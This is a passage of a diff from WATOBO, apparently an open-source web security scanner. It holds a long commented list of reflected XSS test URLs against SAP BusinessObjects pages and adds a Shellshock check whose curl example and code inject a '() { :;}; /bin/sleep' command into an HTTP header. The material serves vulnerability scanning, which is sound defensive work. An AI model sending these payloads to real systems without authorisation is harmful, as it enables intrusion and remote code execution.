http://www.example.com:6405//PerformanceManagement/jsp/sb/roleframe.jsp?rid="<~/XSS/*-
|
27
|
+
http://www.example.com:8080/PerformanceManagement/jsp/viewWebiReportHeader.jsp?sEntry=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
|
28
|
+
http://www.example.com:6405/PerformanceManagement/jsp/viewWebiReportHeader.jsp?sEntry=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
|
29
|
+
http://www.example.com:8080/PerformanceManagement/jsp/wait-frameset.jsp?dummyParam="</script><script>alert(1)</script>
|
30
|
+
http://www.example.com:6405/PerformanceManagement/jsp/wait-frameset.jsp?dummyParam="</script><script>alert(1)</script>
|
31
|
+
http://www.example.com:8080/PlatformServices/preferences.do?cafWebSesInit=true&service=<SCRIPT>alert(1)</SCRIPT>&actId=541&appKind=CMC
|
32
|
+
=end
|
9
33
|
|
10
|
-
=begin
|
11
|
-
http://www.example.com:8080/AdminTools/querybuilder/ie.jsp?ADD_RULE=1&AND_BTN=1&ATTRIBUTES_LIST=1&ATTRIBUTES_NOTES=1&ATTRIBUTES_PROMPT=1&BUILD_SQL_HEADER=1&BUILD_SQL_INSTRUCTION=1&EXIT=1&FINISH=1&FINISH_BTN=1&FINISH_HEADER=1&IETIPS=1&MUST_ANDOR_CLAUSES=1&MUST_SELECT_CLAUSES=1&NO_CLAUSES=1&NO_RULES=1&OR=1&OR_BTN=1&OTHER_RULE_HEADER=1&REMOVE=1&REMOVE_RULE_HEADER=1&RESET=1&RULE_HEADER=1&SELECT_SUBTITLE1=mr&SELECT_SUBTITLE2=mr&SELECT_SUBTITLE3=mr&SELECT_SUBTITLE4=mr&SPECIFY_ATTRIBUTES_PROMPT=1&SUBMIT=1&TITLE=mr&WELCOME_USER=1&framework=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
|
12
|
-
http://www.example.com:8080/AdminTools/querybuilder/logonform.jsp?APSNAME=Procheckup&AUTHENTICATION=1&LOGON=1&LOG_ON=1&NOTRECOGNIZED=1&PASSWORD=Pcu12U4&REENTER=1&TITLE=mr&UNSURE=1&USERNAME=Procheckup&WELCOME_LOGON=1&action=1&framework="><script>alert(1)</script>
|
13
|
-
http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/apply.jsp?WOMdoc=1&WOMqueryAtt=1&WOMquerycontexts=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMunit=1&bodySel=1&capSel=1&colSel=1&compactSteps=1&currReportIdx=1&defaultName=Procheckup&docid=1&doctoken=1&dummy=1&isModified=1&lang="></script><script>alert(1)</script>&lastFormatZone=1&lastOptionZone=1&lastStepIndex=1&mode=1&rowSel=1§ionSel=1&skin=1&topURL=1&unvid=1&viewType=1&xSel=1&ySel=1&zSel=1&
|
14
|
-
http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/apply.jsp?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&
|
15
|
-
http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script>
|
16
|
-
http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/query.jsp?lang="></script><script>alert(1)</script>
|
17
|
-
http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/query.jsp?contexts=1&docid=1&doctoken=1&dummy=1&lang=1&mode=1&queryobjs=1&resetcontexts=1&scope=1&skin="></script><script>alert(1)</script>&unvid=1&
|
18
|
-
http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/query.jsp?skin="></script><script>alert(1)</script>
|
19
|
-
http://www.example.com:8080/AnalyticalReporting/querywizard/jsp/turnto.jsp?WOMblock=1&WOMqueryAtt=1&WOMqueryfilters=1&WOMqueryobjs=1&WOMturnTo=1&WOMunit=1&doctoken=1&dummy=1&lang="></script><script>alert(1)</script>&skin=1&unit=1&
|
20
|
-
http://www.example.com:6405/AnalyticalReporting/querywizard/jsp/turnto.jsp?lang="></script><script>alert(1)</script>
|
21
|
-
http://www.example.com:8080/CrystalReports/jsp/CrystalReport_View/viewReport.jsp?loc=//-->"></script><script>alert(1)</script>
|
22
|
-
http://www.example.com:8080/InfoViewApp/jsp/common/actionNavFrame.jsp?url="></script><script>alert(1)</script>
|
23
|
-
http://www.example.com:8080/PerformanceManagement/scripts/docLoadUrl.jsp?url=%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
|
24
|
-
http://www.example.com:6405/PerformanceManagement/scripts/docLoadUrl.jsp?url=�></script><script>alert(1)</script>
|
25
|
-
http://www.example.com:8080/PerformanceManagement/jsp/aa-display-flash.jsp?swf="><html><body><script>alert(1)</script>
|
26
|
-
http://www.example.com:8080/PerformanceManagement/jsp/alertcontrol.jsp?serSes=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
|
27
|
-
http://www.example.com:6405/PerformanceManagement/jsp/alertcontrol.jsp?serSes=�><script>alert(1)</script>
|
28
|
-
http://www.example.com:8080/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script>
|
29
|
-
http://www.example.com:6405/PerformanceManagement/jsp/viewError.jsp?error=<script>alert(1)</script>
|
30
|
-
http://www.example.com:8080/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?actcontent=1&actiontype=1&actual=1&anlimage=1&columns=1&flowid="<~/XSS/*-*/STYLE=xss:e/**/xpression (location='http://www.procheckup.com')>&flowname=Procheckup&gacid=1&list=1&listname=Procheckup&listonly=1&progstatus=1&progtrend=1&progtrendImage=1&target=http://www.procheckup.com&uid=1&variance=1&viewed=1&
|
31
|
-
http://www.example.com:6405/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?flowid=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&flowname=Procheckup&progtrend=1&viewed=1&
|
32
|
-
http://www.example.com:8080/PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?actcontent=1&actiontype=1&actual=1&anlimage=1&columns=1&flowid="><script>alert(1)</script>&flowname=Procheckup&gacid=1&list=1&listname=Procheckup&listonly=1&progstatus=1&progtrend=1&progtrendImage=1&target=1&uid=1&variance=1&viewed=1&
|
33
|
-
http://www.example.com:6405//PerformanceManagement/jsp/ic_pm/wigoalleftlisttr.jsp?&flowid="><script>alert(1)</script>&flowname=Procheckup&gacid=1&progtrend=1&progtrendImage=1&viewed=1&
|
34
|
-
http://www.example.com:8080/PerformanceManagement/jsp/sb/roleframe.jsp?rid="<~/XSS/*-*/STYLE=xss:e/**/xpression(location='http://www.procheckup.com')>
|
35
|
-
http://www.example.com:6405//PerformanceManagement/jsp/sb/roleframe.jsp?rid="<~/XSS/*-
|
36
|
-
http://www.example.com:8080/PerformanceManagement/jsp/viewWebiReportHeader.jsp?sEntry=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
|
37
|
-
http://www.example.com:6405/PerformanceManagement/jsp/viewWebiReportHeader.jsp?sEntry=%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
|
38
|
-
http://www.example.com:8080/PerformanceManagement/jsp/wait-frameset.jsp?dummyParam="</script><script>alert(1)</script>
|
39
|
-
http://www.example.com:6405/PerformanceManagement/jsp/wait-frameset.jsp?dummyParam="</script><script>alert(1)</script>
|
40
|
-
http://www.example.com:8080/PlatformServices/preferences.do?cafWebSesInit=true&service=<SCRIPT>alert(1)</SCRIPT>&actId=541&appKind=CMC
|
41
|
-
=end
|
42
|
-
|
43
|
-
=begin
|
34
|
+
=begin
|
44
35
|
# @private
|
45
|
-
module Watobo#:nodoc: all
|
46
|
-
module Modules
|
47
|
-
module Active
|
48
|
-
module Sap
|
49
|
-
|
50
|
-
|
51
|
-
class Business_objects < Watobo::ActiveCheck
|
52
|
-
|
53
|
-
def initialize(project, prefs={})
|
54
|
-
|
55
|
-
super(project, prefs)
|
56
|
-
end
|
57
|
-
end
|
58
|
-
|
59
|
-
end
|
60
|
-
end
|
61
|
-
end
|
62
|
-
end
|
36
|
+
module Watobo#:nodoc: all
|
37
|
+
module Modules
|
38
|
+
module Active
|
39
|
+
module Sap
|
40
|
+
|
41
|
+
|
42
|
+
class Business_objects < Watobo::ActiveCheck
|
43
|
+
|
44
|
+
def initialize(project, prefs={})
|
45
|
+
|
46
|
+
super(project, prefs)
|
47
|
+
end
|
48
|
+
end
|
49
|
+
|
50
|
+
end
|
51
|
+
end
|
52
|
+
end
|
53
|
+
end
|
63
54
|
=end
|
@@ -1,12 +1,3 @@
|
|
1
|
-
#.
|
2
|
-
# its_commands.rb
|
3
|
-
#.
|
4
|
-
# Copyright 2014 by siberas, http://www.siberas.de
|
5
|
-
# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
|
6
|
-
# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
|
7
|
-
# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
|
8
|
-
# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
9
|
-
|
10
1
|
# @private
|
11
2
|
module Watobo#:nodoc: all
|
12
3
|
module Modules
|
@@ -1,12 +1,3 @@
|
|
1
|
-
#.
|
2
|
-
# its_service_parameter.rb
|
3
|
-
#.
|
4
|
-
# Copyright 2014 by siberas, http://www.siberas.de
|
5
|
-
# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
|
6
|
-
# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
|
7
|
-
# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
|
8
|
-
# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
9
|
-
|
10
1
|
require 'digest/md5'
|
11
2
|
require 'digest/sha1'
|
12
3
|
|
@@ -1,12 +1,3 @@
|
|
1
|
-
#.
|
2
|
-
# its_services.rb
|
3
|
-
#.
|
4
|
-
# Copyright 2014 by siberas, http://www.siberas.de
|
5
|
-
# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
|
6
|
-
# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
|
7
|
-
# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
|
8
|
-
# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
9
|
-
|
10
1
|
require 'digest/md5'
|
11
2
|
require 'digest/sha1'
|
12
3
|
|
@@ -1,12 +1,3 @@
|
|
1
|
-
#.
|
2
|
-
# its_xss.rb
|
3
|
-
#.
|
4
|
-
# Copyright 2014 by siberas, http://www.siberas.de
|
5
|
-
# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
|
6
|
-
# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
|
7
|
-
# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
|
8
|
-
# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
9
|
-
|
10
1
|
require 'digest/md5'
|
11
2
|
require 'digest/sha1'
|
12
3
|
|
@@ -1,149 +1,140 @@
|
|
1
|
-
|
2
|
-
|
3
|
-
|
4
|
-
|
5
|
-
|
6
|
-
|
7
|
-
|
8
|
-
|
1
|
+
=begin
|
2
|
+
$ curl -i -H "Negotiate: () { :; }; /bin/sleep 3" http://192.168.70.134/cgi-bin/shock.cgi
|
3
|
+
HTTP/1.1 500 Internal Server Error
|
4
|
+
Date: Fri, 24 Jan 2014 08:50:10 GMT
|
5
|
+
Server: Apache/2.2.22 (Debian)
|
6
|
+
Vary: Accept-Encoding
|
7
|
+
Content-Length: 619
|
8
|
+
Connection: close
|
9
|
+
Content-Type: text/html; charset=iso-8859-1
|
9
10
|
|
10
|
-
|
11
|
-
|
12
|
-
|
13
|
-
|
14
|
-
Server
|
15
|
-
|
16
|
-
|
17
|
-
|
18
|
-
|
19
|
-
|
20
|
-
|
21
|
-
|
22
|
-
<
|
23
|
-
|
24
|
-
<
|
25
|
-
<
|
26
|
-
|
27
|
-
|
28
|
-
|
29
|
-
|
30
|
-
|
31
|
-
|
32
|
-
|
33
|
-
|
34
|
-
|
35
|
-
|
36
|
-
|
37
|
-
|
38
|
-
|
39
|
-
|
40
|
-
|
41
|
-
|
42
|
-
|
43
|
-
|
44
|
-
|
45
|
-
|
46
|
-
|
47
|
-
|
48
|
-
|
49
|
-
|
50
|
-
|
51
|
-
|
52
|
-
|
53
|
-
|
54
|
-
|
55
|
-
|
56
|
-
|
57
|
-
|
58
|
-
|
59
|
-
|
60
|
-
|
61
|
-
|
62
|
-
|
63
|
-
|
64
|
-
|
65
|
-
|
66
|
-
|
67
|
-
|
68
|
-
|
69
|
-
|
70
|
-
|
71
|
-
|
72
|
-
|
73
|
-
|
74
|
-
|
75
|
-
|
76
|
-
|
77
|
-
|
78
|
-
|
79
|
-
|
80
|
-
|
81
|
-
|
82
|
-
|
83
|
-
|
84
|
-
|
85
|
-
|
86
|
-
|
87
|
-
|
88
|
-
|
89
|
-
|
90
|
-
|
91
|
-
|
92
|
-
|
93
|
-
|
94
|
-
|
95
|
-
|
96
|
-
|
97
|
-
|
98
|
-
|
99
|
-
|
100
|
-
|
101
|
-
|
102
|
-
|
103
|
-
|
104
|
-
|
105
|
-
|
106
|
-
|
107
|
-
|
108
|
-
|
109
|
-
|
110
|
-
|
111
|
-
|
112
|
-
|
113
|
-
|
114
|
-
|
115
|
-
|
116
|
-
|
117
|
-
|
118
|
-
|
119
|
-
|
120
|
-
|
121
|
-
|
122
|
-
|
123
|
-
|
124
|
-
|
125
|
-
|
126
|
-
|
127
|
-
|
128
|
-
|
129
|
-
|
130
|
-
|
131
|
-
|
132
|
-
|
133
|
-
|
134
|
-
|
135
|
-
|
136
|
-
|
137
|
-
|
138
|
-
|
139
|
-
|
140
|
-
|
141
|
-
|
142
|
-
end
|
143
|
-
end
|
144
|
-
|
145
|
-
# --> eo namespace
|
146
|
-
end
|
147
|
-
end
|
148
|
-
end
|
149
|
-
end
|
11
|
+
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
|
12
|
+
<html><head>
|
13
|
+
<title>500 Internal Server Error</title>
|
14
|
+
</head><body>
|
15
|
+
<h1>Internal Server Error</h1>
|
16
|
+
<p>The server encountered an internal error or
|
17
|
+
misconfiguration and was unable to complete
|
18
|
+
your request.</p>
|
19
|
+
<p>Please contact the server administrator,
|
20
|
+
webmaster@localhost and inform them of the time the error occurred,
|
21
|
+
and anything you might have done that may have
|
22
|
+
caused the error.</p>
|
23
|
+
<p>More information about this error may be available
|
24
|
+
in the server error log.</p>
|
25
|
+
<hr>
|
26
|
+
<address>Apache/2.2.22 (Debian) Server at 192.168.70.134 Port 80</address>
|
27
|
+
</body></html>
|
28
|
+
|
29
|
+
=end
|
30
|
+
|
31
|
+
module Watobo#:nodoc: all
|
32
|
+
module Modules
|
33
|
+
module Active
|
34
|
+
module Shell_shock
|
35
|
+
|
36
|
+
|
37
|
+
class Shell_shock < Watobo::ActiveCheck
|
38
|
+
@info.update(
|
39
|
+
:check_name => 'ShellShock', # name of check which briefly describes functionality, will be used for tree and progress views
|
40
|
+
:check_group => AC_GROUP_GENERIC,
|
41
|
+
:description => "", # description of checkfunction
|
42
|
+
:author => "Andreas Schmidt", # author of check
|
43
|
+
:version => "0.9" # check version
|
44
|
+
)
|
45
|
+
|
46
|
+
threat =<<'EOF'
|
47
|
+
Really bad, bad things can happen!
|
48
|
+
EOF
|
49
|
+
|
50
|
+
measure = "Patch it!"
|
51
|
+
|
52
|
+
@finding.update(
|
53
|
+
:threat => threat, # thread of vulnerability, e.g. loss of information
|
54
|
+
:class => "ShellShock (RCE)", # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
|
55
|
+
:type => FINDING_TYPE_VULN, # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
|
56
|
+
:rating => VULN_RATING_CRITICAL,
|
57
|
+
:measure => measure
|
58
|
+
)
|
59
|
+
|
60
|
+
|
61
|
+
def initialize(project, prefs={})
|
62
|
+
super(project, prefs)
|
63
|
+
|
64
|
+
end
|
65
|
+
|
66
|
+
def generateChecks(chat)
|
67
|
+
|
68
|
+
checker = proc {
|
69
|
+
test_request = nil
|
70
|
+
test_response = nil
|
71
|
+
output = ""
|
72
|
+
|
73
|
+
rtimes = []
|
74
|
+
|
75
|
+
timing_response = nil
|
76
|
+
|
77
|
+
3.times do
|
78
|
+
test = chat.copyRequest
|
79
|
+
start = Time.now().to_i
|
80
|
+
timing_request, timing_response = doRequest(test,:default => true)
|
81
|
+
stop = Time.now().to_i
|
82
|
+
rtimes << ( stop - start )
|
83
|
+
|
84
|
+
end
|
85
|
+
# now calculate the average time
|
86
|
+
t_average = rtimes.inject(:+) / rtimes.length
|
87
|
+
t_average = 1 if t_average == 0
|
88
|
+
|
89
|
+
time_to_sleep = rtimes.max > (2 * t_average) ? rtimes.max : (2 * t_average)
|
90
|
+
|
91
|
+
timeout_counter = 0
|
92
|
+
t_start = Time.now().to_i
|
93
|
+
|
94
|
+
request = chat.copyRequest
|
95
|
+
request.addHeader("Negotiate", "() { :;}; /bin/sleep #{time_to_sleep}")
|
96
|
+
|
97
|
+
test_request, test_response = doRequest(request, :default => true)
|
98
|
+
|
99
|
+
t_stop = Time.now.to_i
|
100
|
+
timeout_counter += 1
|
101
|
+
|
102
|
+
duration = t_stop - t_start
|
103
|
+
# puts duration
|
104
|
+
if ( duration >= time_to_sleep )
|
105
|
+
puts "Found ShellShock Vulnerablitiy !!!"
|
106
|
+
puts "after #{duration}s / time-to-sleep #{time_to_sleep}s)"
|
107
|
+
|
108
|
+
test_request.extend Watobo::Mixin::Parser::Url unless test_request.respond_to? :path
|
109
|
+
|
110
|
+
path = "/" + test_request.path
|
111
|
+
|
112
|
+
output << "SleepTime: #{time_to_sleep}\nQuery Duration: #{duration}s"
|
113
|
+
|
114
|
+
addFinding( test_request, test_response,
|
115
|
+
:check_pattern => "Negotiate.*sleep \d",
|
116
|
+
:chat => chat,
|
117
|
+
:title => "[Timing] - #{path}",
|
118
|
+
:proof_pattern => "",
|
119
|
+
:test_item => "Negotiate",
|
120
|
+
:class => "ShellShock (Time-based)",
|
121
|
+
:output => output
|
122
|
+
)
|
123
|
+
#readlines
|
124
|
+
break
|
125
|
+
end
|
126
|
+
|
127
|
+
|
128
|
+
[ test_request, test_response ]
|
129
|
+
}
|
130
|
+
yield checker
|
131
|
+
|
132
|
+
|
133
|
+
end
|
134
|
+
end
|
135
|
+
|
136
|
+
# --> eo namespace
|
137
|
+
end
|
138
|
+
end
|
139
|
+
end
|
140
|
+
end
|